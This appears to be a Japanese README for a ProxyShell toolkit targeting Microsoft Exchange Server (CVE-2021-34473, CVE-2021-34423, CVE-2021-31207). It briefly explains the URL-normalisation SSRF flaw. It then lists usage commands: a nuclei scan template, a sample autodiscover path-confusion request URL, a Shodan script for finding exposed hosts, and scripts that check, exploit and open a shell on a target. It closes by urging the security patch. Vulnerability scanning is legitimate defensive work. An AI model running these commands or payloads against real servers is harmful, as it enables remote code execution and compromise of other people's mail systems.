
CVE-2021-34473 Microsoft Exchange Server リモートコード実行の脆弱性
CVE-2021-34473 Microsoft Exchange Server リモートコード実行の脆弱性。 この欠陥のあるURL正規化により、Exchange Serverマシンアカウントとして実行中に任意のバックエンドURLにアクセスできます。このバグはProxyLogonのSSRFほど強力ではなく、URLのパス部分のみを操作できますが、任意のバックエンドアクセスでさらなる攻撃を実行するには十分強力です。
Pwn2Ownでorange tsaiによって発見された、Microsoft Exchange Serverに影響を与えるProxyshell RCE (CVE-2021-34423, CVE-2021-34473, CVE-2021-31207) 用のnucleiスキャナー。
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
こちらのセキュリティ更新プログラムを適用してください:CVE-2021-34473